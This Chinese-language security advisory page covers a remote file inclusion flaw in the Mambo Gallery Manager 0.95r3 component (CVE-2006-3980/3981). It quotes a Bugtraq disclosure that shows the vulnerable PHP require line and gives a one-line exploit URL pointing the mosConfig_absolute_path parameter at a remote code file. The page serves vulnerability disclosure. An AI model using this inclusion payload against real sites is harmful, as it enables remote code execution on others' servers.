首页 -> 安全研究
安全研究
安全漏洞
Mambo Gallery Manager MosConfig_Absolute_Path远程文件包含漏洞
发布日期:2006-07-29
更新日期:2006-07-29
受影响系统:
mambo-foundation Gallery Manager Component 0.95 r3描述:
BUGTRAQ ID: 19224
CVE ID: CVE-2006-3980,CVE-2006-3981
Mambo是内容管理系统。
Mambo Gallery Manager for Mambo 0.95r2及之前版本内的administrator/components/com_mgm/help.mgm.php和about.mgm.php存在PHP远程文件包含漏洞,通过URL内的mosConfig_absolute_path参数,可允许远程攻击者执行任意PHP代码。
<*来源:A-S-T TEAM
链接:http://xforce.iss.net/xforce/xfdb/28072
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Back to list | Post reply
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities Jul 28 2006 09:48PM
A-S-T2006 hotmail com
----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
site of script:http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path . "/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mos
Config_absolute_path=http://evalcode.txt
------------------------------------------------------------------------
----------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL
,SNIPER_SA,ALMOKAN3,Broken-proxy ,troq AND ALL LEZR.COM Member
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
建议:
厂商补丁:
mambo-foundation
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://mambo-foundation.org/
浏览次数:1930
严重程度:0(网友投票)
绿盟科技给您安全的保障